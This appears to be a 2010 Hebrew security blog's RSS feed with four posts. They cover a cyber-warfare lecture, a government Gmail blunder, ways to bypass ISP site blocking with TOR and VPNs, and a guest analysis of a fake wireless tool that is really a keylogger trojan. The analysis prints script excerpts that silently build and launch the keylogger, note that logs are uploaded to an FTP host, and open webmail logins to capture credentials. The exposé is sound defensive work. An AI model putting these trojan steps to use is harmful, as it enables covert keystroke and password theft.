<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>&#8235;ZuLL, יומנו של האקר.&#8236;</title>	<atom:link href="http://guym.co.il/feed/" rel="self" type="application/rss+xml" />
	<link>http://guym.co.il</link>
	<description>&#8235;גיא מזרחי כותב על אבטחת מידע, האקינג, גאדג&#039;טים ודברים מעניינים&#8236;</description>	<lastBuildDate>Sun, 29 Aug 2010 06:13:51 +0000</lastBuildDate>
	<generator>http://wordpress.org/?v=2.9.2</generator>
	<language>he</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
			<item>
		<title>&#8235;הרצאה שלי במיקרוסופט על סייבר Warfare&#8236;</title>		<link>http://guym.co.il/warfare/?nucrss=1</link>
		<comments>http://guym.co.il/warfare/#comments</comments>
		<pubDate>Sun, 29 Aug 2010 06:13:51 +0000</pubDate>
		<dc:creator>&#8235;גיא מזרחי&#8236;</dc:creator>				<category><![CDATA[כללי]]></category>

		<guid isPermaLink="false">http://guym.co.il/?p=1575</guid>
		<description><![CDATA[&#8235;אוהד פלוטניק שמנהל במיקרוסופט את ה-Security User Group שאל אותי לפני כמה חודשים אם אוכל להרצות בנושא מעניין לקבוצה.
אחרי המון זמן שניסינו לתאם את זה, ההרצאה שלי תתקיים ביום רביעי הקרוב.
נושא ההרצאה:
סייבר WARFARE , סכנות ברמת מדינה, מערך הגנה ברמת המדינה.
יהיו שם טעימות מנושאים שונים כגון פשעי רשת, טרור קיברנטי וכן הנושא העיקרי &#8211; Cyber [...]<img height="1" width="1" src="http://services.nuconomy.com/i.nsi?methId=log&projTok=93520d00-2f&ownus=admin&sver=WordPress%2F1.48+%28nuconomy%29&srcId=http%3A%2F%2Fguym.co.il%2Fwarfare&crtId=148&dt=1283481168">&#8236;]]></description>			<content:encoded><![CDATA[<div dir="rtl"><p>אוהד פלוטניק שמנהל במיקרוסופט את ה-Security User Group שאל אותי לפני כמה חודשים אם אוכל להרצות בנושא מעניין לקבוצה.<br />
אחרי המון זמן שניסינו לתאם את זה, ההרצאה שלי תתקיים ביום רביעי הקרוב.<br />
נושא ההרצאה:<br />
סייבר WARFARE , סכנות ברמת מדינה, מערך הגנה ברמת המדינה.<br />
יהיו שם טעימות מנושאים שונים כגון פשעי רשת, טרור קיברנטי וכן הנושא העיקרי &#8211; Cyber Warfare.<br />
אתם מוזמנים.</p>
<p>ניתן להירשם פה:</p>
<p><a href="https://msevents.microsoft.com/CUI/EventDetail.aspx?EventID=1032458904&amp;Culture=he-IL" target="_blank">https://msevents.microsoft.com/CUI/EventDetail.aspx?EventID=1032458904&amp;Culture=he-IL</a></p>
<img height="1" width="1" src="http://services.nuconomy.com/i.nsi?methId=log&projTok=93520d00-2f&ownus=admin&sver=WordPress%2F1.48+%28nuconomy%29&srcId=http%3A%2F%2Fguym.co.il%2Fwarfare&crtId=148&dt=1283481168"><p align="left"><a class="tt" href="http://twitter.com/home/?status=%D7%94%D7%A8%D7%A6%D7%90%D7%94+%D7%A9%D7%9C%D7%99+%D7%91%D7%9E%D7%99%D7%A7%D7%A8%D7%95%D7%A1%D7%95%D7%A4%D7%98+%D7%A2%D7%9C+%D7%A1%D7%99%D7%99%D7%91%D7%A8+Warfare+http://bit.ly/d6LGEh" title="Post to Twitter"><img class="nothumb" src="http://guym.co.il/wp-content/plugins/tweet-this/icons/tt-twitter-big4.png" alt="Post to Twitter" /></a></p></div>]]></content:encoded>			<wfw:commentRss>http://guym.co.il/warfare/feed/</wfw:commentRss>
		<slash:comments>20</slash:comments>
		</item>
		<item>
		<title>&#8235;כשמוסד ממלכתי פותח תיבה ב-Gmail&#8236;</title>		<link>http://guym.co.il/gmail-for-gov-bad-idea/?nucrss=1</link>
		<comments>http://guym.co.il/gmail-for-gov-bad-idea/#comments</comments>
		<pubDate>Tue, 03 Aug 2010 05:07:46 +0000</pubDate>
		<dc:creator>&#8235;yovitz&#8236;</dc:creator>				<category><![CDATA[כללי]]></category>
		<category><![CDATA[gmail]]></category>
		<category><![CDATA[ממשלתי]]></category>
		<category><![CDATA[פרטיות]]></category>

		<guid isPermaLink="false">http://guym.co.il/?p=1560</guid>
		<description><![CDATA[&#8235;לפני מס' ימים התפרסמה באתר הפירסומים הממשלתי www.pirsum.gov. המודעה הבאה :

ולעיתונות המודפסת נמסרה ההודעה הבאה :

נסיון Login לתיבה ב-gmail נתן את ההודעה הזאת:

מה שכמובן משאיר אותנו עם פתיחת התיבה על שמנו, וקבלת קורות חיים של מועמדים שכותבים :

וכמובן &#8211; דיסקרטיות זה חשוב.

ככל הנראה השימוש בתיבה של Gmail במקום בתיבה של תהיל&#34;ה (תשתית הממשלה לעידן האינטרנט) [...]<img height="1" width="1" src="http://services.nuconomy.com/i.nsi?methId=log&projTok=93520d00-2f&ownus=yovitz&sver=WordPress%2F1.48+%28nuconomy%29&srcId=http%3A%2F%2Fguym.co.il%2Fgmail-for-gov-bad-idea&crtId=148&dt=1283481168">&#8236;]]></description>			<content:encoded><![CDATA[<div dir="rtl"><p>לפני מס' ימים התפרסמה באתר הפירסומים הממשלתי www.pirsum.gov. המודעה הבאה :</p>
<p style="text-align: center"><a href="http://guym.co.il/wp-content/uploads/2010/08/אישיות-פוליטית-בכירה.gif"><img class="size-full wp-image-1561 aligncenter" src="http://guym.co.il/wp-content/uploads/2010/08/אישיות-פוליטית-בכירה.gif" alt="" width="393" height="246" /></a></p>
<p>ולעיתונות המודפסת נמסרה ההודעה הבאה :</p>
<p><a href="http://guym.co.il/wp-content/uploads/2010/08/itonot.jpg"><img class="alignnone size-full wp-image-1562" src="http://guym.co.il/wp-content/uploads/2010/08/itonot.jpg" alt="" width="305" height="299" /></a></p>
<p>נסיון Login לתיבה ב-gmail נתן את ההודעה הזאת:</p>
<p><a href="http://guym.co.il/wp-content/uploads/2010/08/google-accounts.jpg"><img class="alignnone size-full wp-image-1563" src="http://guym.co.il/wp-content/uploads/2010/08/google-accounts.jpg" alt="" width="552" height="133" /></a></p>
<p>מה שכמובן משאיר אותנו עם פתיחת התיבה על שמנו, וקבלת קורות חיים של מועמדים שכותבים :</p>
<p><a href="http://guym.co.il/wp-content/uploads/2010/08/gmail-tik.jpg"><img class="alignnone size-full wp-image-1564" src="http://guym.co.il/wp-content/uploads/2010/08/gmail-tik.jpg" alt="" width="848" height="403" /></a></p>
<p>וכמובן &#8211; דיסקרטיות זה חשוב.</p>
<p><a href="http://guym.co.il/wp-content/uploads/2010/08/diskreti.jpg"><img class="alignnone size-full wp-image-1565" src="http://guym.co.il/wp-content/uploads/2010/08/diskreti.jpg" alt="" width="323" height="172" /></a></p>
<p>ככל הנראה השימוש בתיבה של Gmail במקום בתיבה של תהיל&quot;ה (תשתית הממשלה לעידן האינטרנט) נועד כדי לא לחשוף מי האישיות הפוליטית הבכירה שמחפשת איש תקשורת עם ניסיון במשברים תקשורתיים.</p>
<p>מסקנות :</p>
<p>1.	כשמוסד ממלכתי רוצה להיות אנונימי שידאג לייצר תיבה בצורה אחראית. עדיף עם שם גנרי כמו  misra801@site.gov.il ואם זה יקר או מורכב בירוקרטית אפשר לנסות את tikshorett@lapam.gov.il  (לשכת הפירסום הממשלתי) אני מאמין שהם יסתדרו עם הגדרת  Forward, אבל אני לא בטוח שיסתדרו עם שיתוף פעולה חוצה משרדים ממשלתיים.</p>
<p>2.	אין, אבל באמת אין על Copy Paste בדברים האלה. למה לייצר שגיאה בשם התיבה?</p>
<p><span style="text-decoration: underline"><strong>תודה ליניב אוביץ על הפוסט.</strong></span></p>
<img height="1" width="1" src="http://services.nuconomy.com/i.nsi?methId=log&projTok=93520d00-2f&ownus=yovitz&sver=WordPress%2F1.48+%28nuconomy%29&srcId=http%3A%2F%2Fguym.co.il%2Fgmail-for-gov-bad-idea&crtId=148&dt=1283481168"><p align="left"><a class="tt" href="http://twitter.com/home/?status=%D7%9B%D7%A9%D7%9E%D7%95%D7%A1%D7%93+%D7%9E%D7%9E%D7%9C%D7%9B%D7%AA%D7%99+%D7%A4%D7%95%D7%AA%D7%97+%D7%AA%D7%99%D7%91%D7%94+%D7%91-Gmail+http://bit.ly/bxeIB0" title="Post to Twitter"><img class="nothumb" src="http://guym.co.il/wp-content/plugins/tweet-this/icons/tt-twitter-big4.png" alt="Post to Twitter" /></a></p></div>]]></content:encoded>			<wfw:commentRss>http://guym.co.il/gmail-for-gov-bad-idea/feed/</wfw:commentRss>
		<slash:comments>30</slash:comments>
		</item>
		<item>
		<title>&#8235;חסימת אתרי אינטרנט &#8211; האם זה אפשרי?&#8236;</title>		<link>http://guym.co.il/%d7%97%d7%a1%d7%99%d7%9e%d7%aa-%d7%90%d7%aa%d7%a8%d7%99-%d7%90%d7%99%d7%a0%d7%98%d7%a8%d7%a0%d7%98-%d7%94%d7%90%d7%9d-%d7%96%d7%94-%d7%90%d7%a4%d7%a9%d7%a8%d7%99/?nucrss=1</link>
		<comments>http://guym.co.il/%d7%97%d7%a1%d7%99%d7%9e%d7%aa-%d7%90%d7%aa%d7%a8%d7%99-%d7%90%d7%99%d7%a0%d7%98%d7%a8%d7%a0%d7%98-%d7%94%d7%90%d7%9d-%d7%96%d7%94-%d7%90%d7%a4%d7%a9%d7%a8%d7%99/#comments</comments>
		<pubDate>Thu, 15 Jul 2010 05:59:27 +0000</pubDate>
		<dc:creator>&#8235;גיא מזרחי&#8236;</dc:creator>				<category><![CDATA[כללי]]></category>
		<category><![CDATA[tunnel]]></category>
		<category><![CDATA[משטרה]]></category>

		<guid isPermaLink="false">http://guym.co.il/?p=1557</guid>
		<description><![CDATA[&#8235;קראתי את הכתבה הזו בדה-מרקר על כך שהמשטרה ביקשה מספקיות אינטרנט לחסום אתרי הימורים.
מעניין. אני יכול לחשוב על כמה אתרים נוספים שהיה כדאי שיציעו לחסום כגון אתרי פדופיליה, אתרי שינאה, אתרי סקס ועוד סוגים רבים של אתרים. (וברצינות, אני חושב שאסור לחסום שום דבר. ניטרליות.)
למה ניטפלו דווקא לאתרי הימורים? זאת שאלה נהדרת.
אם תשאלו אותי, כנראה [...]<img height="1" width="1" src="http://services.nuconomy.com/i.nsi?methId=log&projTok=93520d00-2f&ownus=admin&sver=WordPress%2F1.48+%28nuconomy%29&srcId=http%3A%2F%2Fguym.co.il%2F%25d7%2597%25d7%25a1%25d7%2599%25d7%259e%25d7%25aa-%25d7%2590%25d7%25aa%25d7%25a8%25d7%2599-%25d7%2590%25d7%2599%25d7%25a0%25d7%2598%25d7%25a8%25d7%25a0%25d7%2598-%25d7%2594%25d7%2590%25d7%259d-%25d7%2596%25d7%2594-%25d7%2590%25d7%25a4%25d7%25a9%25d7%25a8%25d7%2599&crtId=148&dt=1283481168">&#8236;]]></description>			<content:encoded><![CDATA[<div dir="rtl"><p>קראתי את הכתבה הזו בדה-מרקר על כך ש<a href="http://www.themarker.com/tmc/article.jhtml?ElementId=az20100714_5455411" target="_blank">המשטרה ביקשה מספקיות אינטרנט לחסום אתרי הימורים</a>.</p>
<p>מעניין. אני יכול לחשוב על כמה אתרים נוספים שהיה כדאי שיציעו לחסום כגון אתרי פדופיליה, אתרי שינאה, אתרי סקס ועוד סוגים רבים של אתרים. (וברצינות, אני חושב שאסור לחסום שום דבר. ניטרליות.)</p>
<p>למה ניטפלו דווקא לאתרי הימורים? זאת שאלה נהדרת.</p>
<p>אם תשאלו אותי, כנראה שהיגעו למסקנה שהאתרים האלה מזינים את עולם הפשע הפיסי והמוחשי (משפחות הפשע וכ&quot;ו).</p>
<p>אם זה באמת הדבר (ואני לא מרמז על כך כי פשוט אין לי מושג) אני יכול להבין את העובדה שהמשטרה תבקש לחסום אתרים כאלה. להבין. זה לא אומר שאני מסכים עם חסימה כזו בשום צורה.</p>
<p>אני חייב לציין שלדעתי יש כמה וכמה אתרים שהיו ראויים יותר להיחסם והזכרתי חלק מהם קודם כגון אתרי פדופיליה ושינאה וגם אותם הייתי מעדיף שלא יחסמו כי ניטרליות הרשת חשובה יותר.</p>
<p>הנקודה שמעניינת אותי היא השאלה האם באמת אפשר לחסום אתרים כאלה שמרוויחים כסף רב ויכולים להשקיע סכומים נכבדים כדי להמשיך להרוויח כסף.</p>
<h2>איך לעקוף חסימת אתרי הימורים? איך לעקוף חסימת אתרים?</h2>
<p>יש כמה וכמה פתרונות שיאפשרו למהמר הישראלי להמשיך להוציא את כספו.</p>
<p>פתרון קל וזול: תיעול התעבורה דרך רשת המאפשרת אנונמיות כגון <a href="http://www.torproject.org/" target="_blank">TOR</a>. מורידים דפדפן ייעודי ונגמר הסיפור של חסימת האתר כי כל התעבורה יוצאת ממקום אחר בעולם ולא מישראל. הבעיה העיקרית עם TOR היא איטיות.</p>
<p>פתרון קל וזמין: תיעול התעבורה בעזרת חיבור VPN אל חו&quot;ל. פתרון כגון <a href="http://hotspotshield.com/" target="_blank">Hotspot Shield</a> יאפשר לכם להמשיך להמר. יש הרבה פתרונות דומים שתוכלו למצוא ע&quot;י גיגול <a href="http://www.google.co.il/search?hl=iw&amp;rlz=1B3GGLL_en___IL382&amp;q=hotspot+VPN&amp;meta=&amp;aq=f&amp;aqi=&amp;aql=&amp;oq=&amp;gs_rfai=" target="_blank">hotspot VPN</a>.</p>
<p>הבעיה עם תיעול תעבורה כזה היא שמישהו יכול לראות את התעבורה שלכם &#8211; אותו ספק שירותים.</p>
<p>דרך חכמה יותר לצאת על העולם היא לרכוש שרת VPS שלכם (עלות של כ-10$ לחודש) ולהתקין עליו מוצר כגון OPENVPN. בצורה זו תוכלו להמשיך להינות מאינטרנט מוצפן ומתועל דרך חו&quot;ל אך בלי שמישהו יוכל להקליט בקלות את התעבורה שלכם. (ברור, ספק ה-VPS וספק האינטרנט עדיין יכולים לעשות זאת וגם שירותי הבטחון של המדינה ממנה רכשתם את השירות אבל הם פחות מאיימים מאשר ספק שירותים לא ידוע או מפעיל שרת TOR).</p>
<p>אני בטוח שאתתרי ההימורים יוכלו לספק די בקלות תוכנה שתיתן את האפשרות לעשות זאת בצורה אוטומטית ובהנחה שהם יהיו חכמים (והם יהיו. יש להם מספיק כסף ומוטיבציה) הם יוכלו די בקלות לעקוף את החסימה.</p>
<p>ההחלטה הזאת של המשטרה תעשה חודש של בעיה ואח&quot;כ יצירת הפתרון הזמין והקל ללקוח ייכנס בתור חלק מההוצאות של האתרים. זה לא יהיה אפשרי לחסום אותם.</p>
<img height="1" width="1" src="http://services.nuconomy.com/i.nsi?methId=log&projTok=93520d00-2f&ownus=admin&sver=WordPress%2F1.48+%28nuconomy%29&srcId=http%3A%2F%2Fguym.co.il%2F%25d7%2597%25d7%25a1%25d7%2599%25d7%259e%25d7%25aa-%25d7%2590%25d7%25aa%25d7%25a8%25d7%2599-%25d7%2590%25d7%2599%25d7%25a0%25d7%2598%25d7%25a8%25d7%25a0%25d7%2598-%25d7%2594%25d7%2590%25d7%259d-%25d7%2596%25d7%2594-%25d7%2590%25d7%25a4%25d7%25a9%25d7%25a8%25d7%2599&crtId=148&dt=1283481168"><p align="left"><a class="tt" href="http://twitter.com/home/?status=%D7%97%D7%A1%D7%99%D7%9E%D7%AA+%D7%90%D7%AA%D7%A8%D7%99+%D7%90%D7%99%D7%A0%D7%98%D7%A8%D7%A0%D7%98+%E2%80%93+%D7%94%D7%90%D7%9D+%D7%96%D7%94+%D7%90%D7%A4%D7%A9%D7%A8%D7%99%3F+http://bit.ly/cMP7eO" title="Post to Twitter"><img class="nothumb" src="http://guym.co.il/wp-content/plugins/tweet-this/icons/tt-twitter-big4.png" alt="Post to Twitter" /></a></p></div>]]></content:encoded>			<wfw:commentRss>http://guym.co.il/%d7%97%d7%a1%d7%99%d7%9e%d7%aa-%d7%90%d7%aa%d7%a8%d7%99-%d7%90%d7%99%d7%a0%d7%98%d7%a8%d7%a0%d7%98-%d7%94%d7%90%d7%9d-%d7%96%d7%94-%d7%90%d7%a4%d7%a9%d7%a8%d7%99/feed/</wfw:commentRss>
		<slash:comments>32</slash:comments>
		</item>
		<item>
		<title>&#8235;איך לנסות לרמות האקרים ולצאת טמבל &#8211; פוסט אורח של יפתח עמית&#8236;</title>		<link>http://guym.co.il/%d7%9c%d7%a0%d7%a1%d7%95%d7%aa-%d7%9c%d7%a8%d7%9e%d7%95%d7%aa-%d7%94%d7%90%d7%a7%d7%a8%d7%99%d7%9d-%d7%95%d7%9c%d7%a6%d7%90%d7%aa-%d7%98%d7%9e%d7%91%d7%9c/?nucrss=1</link>
		<comments>http://guym.co.il/%d7%9c%d7%a0%d7%a1%d7%95%d7%aa-%d7%9c%d7%a8%d7%9e%d7%95%d7%aa-%d7%94%d7%90%d7%a7%d7%a8%d7%99%d7%9d-%d7%95%d7%9c%d7%a6%d7%90%d7%aa-%d7%98%d7%9e%d7%91%d7%9c/#comments</comments>
		<pubDate>Sun, 11 Jul 2010 04:17:02 +0000</pubDate>
		<dc:creator>&#8235;יפתח עמית&#8236;</dc:creator>				<category><![CDATA[כללי]]></category>
		<category><![CDATA[Hacking]]></category>
		<category><![CDATA[wireless]]></category>

		<guid isPermaLink="false">http://guym.co.il/?p=1543</guid>
		<description><![CDATA[&#8235;הפוסט הזה הוא תרגום של פוסט שלי (http://www.iamit.org/blog/2010/07/how-not-to-scam-security-people/) שחשבתי שיכול להתאים לפרסום בבלוג של גיא מכיוון שקהל היעד שלו הוא בעיקר אנשים שמתעסקים בהאקינג, אבטחת מידע או איך-שלא-תקראו-לזה&#8230; מקווה שתהנו (ותסלחו לי על הניסוחים הכושלים – כאמור זה תרגום).
בשבוע שעבר יצא לי &#34;לשחק&#34; קצת עם כלים לבדיקת רמת ההגנה של רשתות אלחוטיות בעקבות בקשה של [...]<img height="1" width="1" src="http://services.nuconomy.com/i.nsi?methId=log&projTok=93520d00-2f&ownus=iamit&sver=WordPress%2F1.48+%28nuconomy%29&srcId=http%3A%2F%2Fguym.co.il%2F%25d7%259c%25d7%25a0%25d7%25a1%25d7%2595%25d7%25aa-%25d7%259c%25d7%25a8%25d7%259e%25d7%2595%25d7%25aa-%25d7%2594%25d7%2590%25d7%25a7%25d7%25a8%25d7%2599%25d7%259d-%25d7%2595%25d7%259c%25d7%25a6%25d7%2590%25d7%25aa-%25d7%2598%25d7%259e%25d7%2591%25d7%259c&crtId=148&dt=1283481168">&#8236;]]></description>			<content:encoded><![CDATA[<div dir="rtl"><p>הפוסט הזה הוא תרגום של פוסט שלי (<a href="http://www.iamit.org/blog/2010/07/how-not-to-scam-security-people/">http://www.iamit.org/blog/2010/07/how-not-to-scam-security-people/</a>) שחשבתי שיכול להתאים לפרסום בבלוג של גיא מכיוון שקהל היעד שלו הוא בעיקר אנשים שמתעסקים בהאקינג, אבטחת מידע או איך-שלא-תקראו-לזה&#8230; מקווה שתהנו (ותסלחו לי על הניסוחים הכושלים – כאמור זה תרגום).</p>
<p>בשבוע שעבר יצא לי &quot;לשחק&quot; קצת עם כלים לבדיקת רמת ההגנה של רשתות אלחוטיות בעקבות בקשה של לקוח &quot;להריץ כלים לא שגרתיים כמו שכולם מריצים&quot; (למרות הסלידה שלי מדרישות לכלים ספציפיים ו/או לספק רשימת מכולת של &quot;מה אתה הולך להריץ&quot;&#8230; נחש מה? לא משנה במה אני משתמש, אתה יכול להיות בטוח שבאיזשהו שלב אני הולך להפתיע אותך&#8230;).</p>
<p>במסגרת החיפוש, ובעזרתם המקרית של <a href="http://techcrunch.com/2010/07/05/employees-challenged-to-crack-facebook-security-succeed/">טק-קראנץ'</a>, הגעתי <a href="http://fadzilmahfodh.blogspot.com/2009/07/8-wpa-hack-without-using-dictionary.html">לאתר הזה</a> המתיימר להיות מוקדש לאבטחת רשתות אלחוטיות. אז אחרי שהתגברתי על הבחילה הקלה מהעיצוב המזעזע (וכן – מוזיקת רקע באתר זה כל כך 90'&#8230;) הורדתי את 4 הקבצים האמורים להוות את הכלי. איפה ההתלבטות בכלל כשה-FBI משתמש באותם כלים&#8230;</p>
<p style="text-align: right"><a href="http://guym.co.il/wp-content/uploads/2010/07/fbi.png"><img class="size-full wp-image-1544 aligncenter" src="http://guym.co.il/wp-content/uploads/2010/07/fbi.png" alt="" width="188" height="176" /></a></p>
<p>בדיקה מהירה – ויש לנו שלושה סקריפטים (לכאורה) וזיפ (איך מתרגמים tarball לעברית? כדורזפת? טארבול?). למה לכאורה? מכיוון שכשסקריפט שאמור להיות טקסטואלי מזוהה על ידי המערכת כקובץ ELF אתה יודע שמשהוא &quot;מסריח&quot; קורה כאן. וכך התחיל הסיפור שנתן לי להגיע לסוף השבוע מחוייך ומבודח (בד&quot;כ אני סתם מותש).</p>
<p>אז הנה סיכום &quot;מנהלים&quot; למה שקורה באתר של החבר שלנו שה-FBI משתמשים לכאורה בכלים שלו:</p>
<ol>
<li>הכלים שהוא מספק אינם כלי אבטחת מידע בכלל. בהתחלה עוד נתתי לו להנות מהספק – נו, עוד מישהו שארז כלים ידועים בסקריפט משלו לצרכי נוחות.אבל לא. אפילו <a href="http://theta44.org/karma/index.html">karma</a> לא היתה כלולה שם – למרות שהסקריפט הראשי נקרא כך, ולמעשה זו הפונקציונליות שהכלי אמור היה לספק.</li>
<li>מבט זריז בזיפ מראה שהוא מכיל בכלל keylogger <a href="http://code.google.com/p/logkeys/">שנגנב מכאן</a>.</li>
<li>כשהסקריפט הראשי מופעל, שני סקריפטים נוספים מופעלים ברקע – האחד מקמפל את ה-keylogger ומריץ אותו, והשני דואג להעלות את תעוד ההקלדות ל-FTP כדי שהמתקיף יוכל לעקוב אחריך.</li>
<li>במקביל, הסקריפט הראשי במסגרת &quot;ההתקנה&quot; דורש ממך לשלוח אימייל לכותב הכלי על מנת לקבל קוד אקטיבציה, ובאופן מאד נוח פותח עבורך את פיירפוקס (שועל-אש? שואש?) עם שלושה טאבים לגימייל, יאהו, והוטמייל. לטענת הסקריפט לאחר שליחת האימייל אתה אמור לקבל קוד אקטיבציה חינם אוטומטית.</li>
</ol>
<p>נחזור ל&quot;כלים&quot; שלנו. כאמור הסקריפטים הם לא סקריפטים. מה נהיה? פשוט – הם היו פעם סקריפטים, אבל כדי לטשטש את מה שבאמת נעשה, הם &quot;קומפלו&quot; לקבצים בינריים באמצעות <a href="http://www.unixref.com/manPages/shc.html">shc</a>. המרת הקבצים הבינריים חזרה לסקריפטים היתה פשוטה למדי (שעורי בית -–לקרוא את התעוד של shc ולשחק עם הקבצים בבית).</p>
<p>עכשיו כשקצת יותר ברור מול מה אנחנו עומדים, בואו נסתכל על חלק מהקוד של הסקריפטים ומה עומד מאחוריהם. אפילו אם אתם לא סקריפטולוגים מהוללים, די קל לעקוב אחרי הנעשה (ויש אפילו הערות בקוד!!!).</p>
<div dir="ltr"># START BACKGROUND PROGRAMS BG1(RUN LINUX KEYLOGGER) AND BG2(RUN MONITORING KEYSTROKES AND SEND LOG.TXT FILES TO DRIVEHQ)<br />
cd lkl2<br />
./configure –silent<br />
make –silent<br />
make install –silent<br />
cd<br />
chmod +x /root/bg1.sh<br />
nohup /root/bg1.sh &amp;<br />
rm -r /root/nohup.out<br />
chmod +x /root/bg2.sh<br />
nohup /root/bg2.sh &amp;<br />
sleep 2<br />
rm -r /root/nohup.out<br />
clear</div>
<p>אוקיי, אז אנחנו רואים איך ה-keylogger מקומפל ומותקן, ושני הסקריפטים הנוספים bg1.sh ו-bg2.sh מורצים ברקע. בשלב הבא, אנו מגיעים ל&quot;התקנה&quot; בה הסקריפט הראשי (כאמור karma.sh) מבקש מהמשתמש לשלוח אימייל לצרכי אקטיבציה המכיל הצהרה כי השימוש בכלי איננו משמש לעבירה על החוק.</p>
<div dir="ltr">
<p># MENU LIST</p>
<p>echo “”</p>
<p>echo “——————————————————— “</p>
<p>echo “THIS MESSAGES WILL NOT APPEAR AFTER karma.sh IS ACTIVATED “</p>
<p>echo “——————————————————— “</p>
<p>echo “”</p>
<p>echo “1. Compose indemnity text below and send to fadzilmahfodh@gmail.com”</p>
<p>echo “ Yes, I want activation code and will never use for illegal purpose”</p>
<p>echo “”</p>
<p>echo “2. Check your email for activation code after sending text “</p>
<p>echo “”</p>
<p>read -p “3. Send now ? (0=no, 1=yes) “ act</p>
<p>clear</p>
</div>
<p>הזכרתי כי ההתקפה כאן מכוונת לאנשים שמתעסקים באבטחת מידע והאקינג, והנה הוכחה נוספת:</p>
<p dir="ltr">read -p “Which backtrack are you using ? (bt3=3,bt4=4) ” bt</p>
<p>נחמד&#8230; מוודאים איתנו באיזה גירסה של BackTrack אנחנו משתמשים. לזכות כותב הסקריפט ייאמר שאכן ההתנהגות של הסקריפט משתנה בהתאם לגירסת מ&quot;ה עליה אנחנו רצים (שינויי קונפיגורצית רשת וכו').</p>
<p>בשלב הבא מוודאים שהדפדפן סגור, ופותחים עבורנו את שלושת אתרי הוובמייל:</p>
<p dir="ltr">firefox https://login.yahoo.com/ &amp;<br />
sleep 4</p>
<p dir="ltr">firefox https://www.google.com/accounts/ManageAccount &amp;</p>
<p dir="ltr">sleep 4</p>
<p dir="ltr">firefox http://home.live.com/</p>
<p>המתקיף רוצה כמובן שנבצע כניסה מלאה לאימייל שלנו (עם ניחוש לא רע המכסה את ספקי האימייל העיקריים), כדי שנשלח את הבקשה לקוד האקטיבציה – וכל זאת כאמור כאשר ה-keylogger עובד במרץ ברקע ומקליט כל הקלדה שלנו ושולח אותה ל-FTP. בדיוק כאן רוב המשתמשים ייפלו&#8230;</p>
<p>השלב הבא בסקריפט – האקטיבציה עצמה. או שלא.</p>
<p dir="ltr">############################</p>
<p dir="ltr"># DECOY FOR ACTIVATION CODE</p>
<p dir="ltr">clear</p>
<p dir="ltr">echo “”</p>
<p dir="ltr">read -p “ENTER ROGUE AP ACTIVATION CODE : ” pls</p>
<p dir="ltr">sleep 3</p>
<p dir="ltr">echo “You have entered an invalid code ”</p>
<p dir="ltr">echo “”</p>
<p dir="ltr">exit</p>
<p dir="ltr">############################</p>
<p>יש להודות כי ההערות בגוף הסקריפט משעשעות – &quot;פתיון&quot; האקטיבציה די ברור כאן, ובמיוחד אהבתי את ההמתנה של שלוש השניות לפני שהמשתמש מיודע כי הקוד לא נכון. אפשר ממש להרגיש שהכלי עובד קשה כדי לוודא אותו ברקע. קלאסי!</p>
<p>זה פחות או יותר לשלב הניתוח הטכני של הקבצים המוצעים מהאתר. אבל לא הייתי טורח לכתוב את הפוסט הזה (ולתרגם אותו – שבינתיים לוקח לי יותר זמן מכתיבת הפוסט המקורי ), אלמלא הייתי נתקל בידידינו ההאקר המפורסם בצ'אט. אז האינטראקציה התחילה כשכתבתי אימייל על מנת לראות כיצד האקטיבציה קורה, ולאחר כיום קיבלתי תשובה (ממש &quot;מענה אוטומטי&quot;&#8230;):</p>
<p dir="ltr">Hi</p>
<p dir="ltr">1. We are preparing the activation code for you.</p>
<p dir="ltr">2. To make worth our while, could you consider a small donation (suggest euro 11) to support the website via Paypal a/c fadzilmahfodh@yahoo.com ?</p>
<p dir="ltr">Cheers.</p>
<p dir="ltr">EMAIL VIA MY CELLPHONE FOR FAST RESPONSE</p>
<p dir="ltr">http://fadzilmahfodh.blogspot.com</p>
<p>אז לא רק שלא קיבלתי קוד אקטיבציה, הם &quot;מכינים&quot; אותו (מה זה אומר? הלכו לקטוף צמחים מיוחדים לקוד שלי?), אלא שאני מתבקש לתרום מעשר קל למסכן שעבד כל כך קשה על כתיבת כלי אבטחה משהו משהו ומעניק אותו בחינם לקהילה&#8230; אוקיי, אז עניתי בנימוס ש:</p>
<p>1.	תודה – אני מחכה בכליון עיניים לקוד.</p>
<p>2.	אני אשקול תרומה אולי אחרי שאנסה את הכלי.</p>
<p>ובמהרה קיבלתי מענה המציע לי לנסות כלי אחר (שבכלל לא קשור למה שהכלי המקורי אמור לעשות) בגרסת נסיון.</p>
<p>המממ, מעניין. למזלי השתמשתי בחשבון ספאמי של יאהו וכנראה שגם ידידינו&#8230; מי שלא מכיר, ביאהו אפשר לראות את הסטטוס של מי שאתה מתכתב אתו באימייל ולצ'וטט איתו דרך ממשק הווב אם הוא כרגע זמין! אז זה בדיוק מה שעשיתי&#8230;</p>
<p dir="ltr">—– Our chat on Wed, 7/7/10 2:53 PM —–</p>
<p dir="ltr">Iftach(2:34 PM):  hey man</p>
<p dir="ltr">Iftach(2:34 PM):  mind if a ask a couple of questions?</p>
<p dir="ltr">fadzilmahfodh(2:34 PM):  okey</p>
<p dir="ltr">Iftach(2:35 PM):  cool. I’m doing this research on security tools and their authors…</p>
<p dir="ltr">fadzilmahfodh(2:35 PM):  okey</p>
<p dir="ltr">Iftach(2:35 PM):  saw your tool and wanted to hear about how you got to write</p>
<p dir="ltr">it, how well is it distributed in the community etc…</p>
<p dir="ltr">Iftach(2:36 PM):  does that activation thing a common practice with free tools?</p>
<p dir="ltr">fadzilmahfodh(2:36 PM):  yes see, we need to maintain our website thus we need supporter</p>
<p dir="ltr">fadzilmahfodh(2:37 PM):  everyday there are at least 500++ people asking for code</p>
<p dir="ltr">Iftach(2:37 PM):  I see.</p>
<p dir="ltr">fadzilmahfodh(2:37 PM):  i no longer able to provide for free</p>
<p dir="ltr">fadzilmahfodh(2:37 PM):  too time consuming and i need to be compensated for my</p>
<p dir="ltr">time and effort</p>
<p dir="ltr">fadzilmahfodh(2:38 PM):  hope you understand</p>
